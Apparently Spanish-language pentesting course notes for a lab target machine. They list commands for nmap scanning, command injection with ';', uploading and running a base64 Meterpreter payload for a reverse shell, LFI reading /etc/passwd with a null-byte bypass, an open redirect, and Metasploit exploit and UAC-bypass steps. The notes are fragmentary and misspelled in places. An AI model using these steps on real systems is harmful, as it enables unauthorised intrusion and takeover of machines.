Beruflich Dokumente
Kultur Dokumente
pablo@flu-project.com
www.modem.ie descargar maquians virtuales
MAQUINA METAEXPLOIT
Command Injection
sacando un 404 (not fount) nos dir el S.O.
nmap -O -p 80 -sV 192.168.56.102
Nos saca que es un linux
podemos concatenar comandos en la caja de texto
;echo "Hola"
con el comando w nos die quien somos, normalmente www-data
Vamos a intentar coger el control de la maquina:
Opcion1: con wget podemos decargar un fichero al directorio donde estamos
;wget ....
Opcion2: Generar payload (codigo ejecutable) lo subimos en base64 a la maquina
remota, lo pasamos a binario y lo ejecutamos
Con metaexploit generamos este cdigo que ejecuta un mterpreter para linux
El cdigo est en base64
;echo "dada5d454d8sad3a1d3as4d8---" >/tmp/taes
;ls -l /tmp
(tendremos el fichero)
Transformamos el bse64 a binario:
;cat /tmp/taes | base64 -d > /tmp/taes.bin
(no tenemos permiso de ejeccion)
;chmod 755 /tmp/taes.bin
(Tenemos un binario subido a la maquina y con permisos)
Configuramos con metaexploit para que el paylod se nos conecte
ejecutamos el taes.bin
En el metaexploit ya tenemos una consola con comandos del meterpreter con permisos
limitados
getuid
(nos dice que es el 33 - www-data)
Recopilacion de informacin de ese sistema
Ver pgina web y sacar info de los php
Con la info del nmap anterior podemos ver la info del apache, buscar ms puertos:
ftp, ssh, telnet, smtp, dns,....
sacamos info del ssh
nmap -O -p 21,22 -sV 192.168.56.102
Vulnerabilidad LFI
Acceso ficheros locales
OWASP - ZAP
Navegador -> Proxy
Ponemos IP puerto de ZAP
En el ZAP vemos las cabeceras que se estn enviando a la web
Con SSL se complica.
Por qu ocurre?
PHP:
include $_GET[param]
url:.........../../../../etc/password
Podemo ver el contenido
Saltar proteccion byte null: Que nos pongan una extensin en el fichero
url:.........../../../../etc/password%00
OPEN REDIRECT
Le pasamos a la url
http://amaddasd/google.com
https://www.google.com.sl/search?source=&q=www.elladodelmal.com&btnI=
EXPLOITS
- Buffer overflow
- Integer overflow
..
..
Exploitdb: Nos da la aplicacin vulnerable y el sploit
Hemos de fijarnos en el target que nos da las caractersticas del equipo que ha de tener
la vulnerabilidad
Demo: Kolibri
Metaexploit kali:
Modules -> /usr/share/metasploit-framework/modules/exploits/(Plataformas)....
msfcli
Kali -> SystemServices -> metaexploit -> start
msfconsole
Recargar modulos
reload_all
use exploit/window/http/33790
show options
info -> saca datos del exploit
set RHOST IP
set PAYLOAD windows/meterprter/reverse
set LHOST IP Maquina que devolver el control
exploit
getuid
(nos dice el usuario)
Nos devuelve una consola en el host remoto
Cuando es reverse le configuramos con lhost la ip a la que tiene que volver (tnel
inverso)
En el caso de bind (directo) nos esperar en un puerto
Si queremos hacer escala de privilegios
>use exploit/windows/local/bypasuac
podemos lanzar el exploit de ambito local por la sesin que hemos abierto previamente
>sessions
>set PAYLOAD win../meter/inver_tcp
>set LH
...
setoolkit